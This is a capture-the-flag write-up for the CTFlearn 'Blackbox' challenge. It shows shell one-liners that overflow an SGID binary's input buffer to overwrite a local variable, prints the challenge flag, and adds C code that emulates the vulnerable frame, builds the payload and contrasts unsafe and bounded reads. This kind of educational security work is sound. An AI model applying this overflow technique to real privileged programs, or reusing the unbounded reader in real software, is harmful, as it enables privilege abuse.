Blackbox
We are given a server to connect to over SSH. In the home directory there is a binary called blackbox
that is SGID (it runs with the blackbox_pwn group, which is the group that can read flag.txt):
blackbox@ubuntu-512mb-nyc3-01:~$ ls -l
total 16
---x--s--x 1 root blackbox_pwn 8936 Jan 31 2019 blackbox
-r--r----- 1 root blackbox_pwn 33 Oct 9 2017 flag.txt
blackbox@ubuntu-512mb-nyc3-01:~$ file blackbox
blackbox: setgid executable, regular file, no read permission
As can be seen, the binary is execute-only: we have no read permission, so we cannot copy it to our machine, disassemble it, or read it from a debugger (and as an SGID process it is not dumpable either, so attaching to it is out too). The only thing we can do is run it:
blackbox@ubuntu-512mb-nyc3-01:~$ ./blackbox
What is 1 + 1 =
That prompt is the only user input. If we answer the question, we get:
blackbox@ubuntu-512mb-nyc3-01:~$ ./blackbox
What is 1 + 1 = 2
No dummy... 1 + 1 != 0...
If we fuzz this input using Python, we get a *** stack smashing detected ***
message:
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 100)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 1094795585...
*** stack smashing detected ***: <unknown> terminated
[1]+ Stopped python3 -c 'print("A" * 100)' | ./blackbox
So the binary is compiled with a stack canary, which aborts the process when the overflow reaches the guard value before the function returns. But note the echoed number: it went from 0 to 1094795585, so our input also overwrote the variable the program compares against 2, and that variable sits before the canary. A stack protector guards the return address, not the locals next to the buffer. We can decrease the number of characters until we find where that variable starts:
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 80)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 0...
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 81)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 65...
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 82)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 16705...
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 83)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 4276545...
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 84)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 1094795585...
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 85)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 1094795585...
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 86)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 1094795585...
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 87)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 1094795585...
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 88)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 1094795585...
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 89)' | ./blackbox
What is 1 + 1 = No dummy... 1 + 1 != 1094795585...
*** stack smashing detected ***: <unknown> terminated
[2]+ Stopped python3 -c 'print("A" * 89)' | ./blackbox
If we take the numbers and print them in hexadecimal, we will see what is happening:
>>> hex(65)
'0x41'
>>> hex(16705)
'0x4141'
>>> hex(4276545)
'0x414141'
>>> hex(1094795585)
'0x41414141'
The echoed value is our input bytes reinterpreted as a little-endian integer: the first 80 characters fill the buffer, and characters 81 to 84 land in the four bytes of the integer that holds the answer. That also tells us the program does not parse our text as a number (typing "2" gave 0x32 = 50, not 2), so we need the raw byte "\x02" where the single "A" (0x41) was. That is, we enter 80 filler characters and the next character must be "\x02"; the terminator written after it and the untouched zero bytes above it make the integer exactly 2, so the question has a correct answer:
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("A" * 80 + "\x02")' | ./blackbox
What is 1 + 1 = CORRECT! You get flag:
CTFlearn{0n3_4lus_1_1s_Tw0_dumm13!!}
[3]+ Stopped python3 -c 'print("A" * 80 + "\x02")' | ./blackbox
Or even shorter:
blackbox@ubuntu-512mb-nyc3-01:~$ python3 -c 'print("\x02" * 81)' | ./blackbox
What is 1 + 1 = CORRECT! You get flag:
CTFlearn{0n3_4lus_1_1s_Tw0_dumm13!!}
[3]+ Stopped python3 -c 'print("\x02" * 81)' | ./blackbox
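The binary's source was never readable, so the following is an added example, not the challenge's own code. It models the frame layout the probing above implies, an 80-byte input buffer followed directly by the 32-bit answer and then the stack protector's guard, pinned down with a struct so the demonstration is deterministic (in the real binary the layout is whatever the compiler emitted, and the 80-byte offset, the 8-byte-aligned guard and its zero low byte are assumptions; little-endian byte order is assumed as well). It reproduces the values the probing printed, generalises the manual length search into a loop, builds the winning payload, and shows a bounded reader that leaves the answer untouched.

```c
/* Added example: emulation of the blackbox frame inferred from the writeup,
 * not the real binary. Offsets and guard value are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN 80                               /* assumed: first length at which the answer changed */
#define CANARY_VALUE 0x0123456789abcd00ULL      /* assumed guard; low byte zero as glibc's canary is */

struct frame {
    char buf[BUF_LEN];   /* unbounded input buffer */
    int32_t answer;      /* directly after the buffer; read as a little-endian int */
    uint64_t canary;     /* stand-in for the stack protector's guard (8-byte aligned, so at offset 88) */
};

/* Emulates gets(): copy up to newline/NUL with no bounds check, then NUL-terminate.
 * Writes run through answer and into the canary. This is the vulnerable behaviour. */
static size_t unsafe_read_line(struct frame *f, const char *line) {
    size_t n = 0;
    for (; line[n] != '\0' && line[n] != '\n'; n++)
        ((char *)f)[n] = line[n];
    ((char *)f)[n] = '\0';
    return n;
}

/* Hardened reader: bounded copy that always terminates inside buf. */
static size_t safe_read_line(struct frame *f, const char *line) {
    size_t n = 0;
    for (; n < BUF_LEN - 1 && line[n] != '\0' && line[n] != '\n'; n++)
        f->buf[n] = line[n];
    f->buf[n] = '\0';
    return n;
}

/* Feed one line to the vulnerable reader; *smashed reports whether the guard changed
 * (the condition the real canary check aborts on). Returns the resulting answer. */
static int32_t run_unsafe(const char *line, int *smashed) {
    struct frame f;
    memset(&f, 0, sizeof f);
    f.canary = CANARY_VALUE;
    unsafe_read_line(&f, line);
    *smashed = (f.canary != CANARY_VALUE);
    return f.answer;
}

static int32_t run_safe(const char *line) {
    struct frame f;
    memset(&f, 0, sizeof f);
    safe_read_line(&f, line);
    return f.answer;
}

/* Answer produced by n copies of byte c (kept within the modelled frame). */
static int32_t answer_for_repeated(char c, int n, int *smashed) {
    char probe[sizeof(struct frame)];
    if (n < 0) n = 0;
    if (n > (int)sizeof probe - 1) n = (int)sizeof probe - 1;
    memset(probe, c, (size_t)n);
    probe[n] = '\0';
    return run_unsafe(probe, smashed);
}

/* Generalises the manual probing: the first length n at which the echoed answer
 * stops being 0 puts the answer at offset n - 1. Returns -1 if the guard is hit first. */
static int find_answer_offset(void) {
    for (int n = 1; n < (int)sizeof(struct frame) - 1; n++) {
        int smashed;
        int32_t a = answer_for_repeated('A', n, &smashed);
        if (smashed) return -1;
        if (a != 0) return n - 1;
    }
    return -1;
}

/* Winning line: filler up to the answer, then a single 0x02. The reader's NUL
 * terminator and the zeroed bytes above it supply the rest of the int, so answer == 2. */
static size_t build_payload(char *out, size_t cap, int offset) {
    if (offset < 0 || (size_t)offset + 2 > cap) return 0;
    memset(out, 'A', (size_t)offset);
    out[offset] = '\x02';
    out[offset + 1] = '\0';
    return (size_t)offset + 1;
}

int main(void) {
    int smashed;
    for (int n = 80; n <= 89; n++)
        printf("%2d x 'A' -> answer %d smashed %d\n", n, answer_for_repeated('A', n, &smashed), smashed);
    char line[128];
    int off = find_answer_offset();
    size_t len = build_payload(line, sizeof line, off);
    printf("offset %d, %zu-byte payload -> unsafe answer %d, safe answer %d\n",
           off, len, run_unsafe(line, &smashed), run_safe(line));
    return 0;
}
```

With this layout 88 'A's leave the guard intact only because the NUL written at offset 88 matches the guard's zero low byte, and the 89th 'A' is what trips it, which is consistent with the page's output but is an artefact of the assumed frame, not something the page proves.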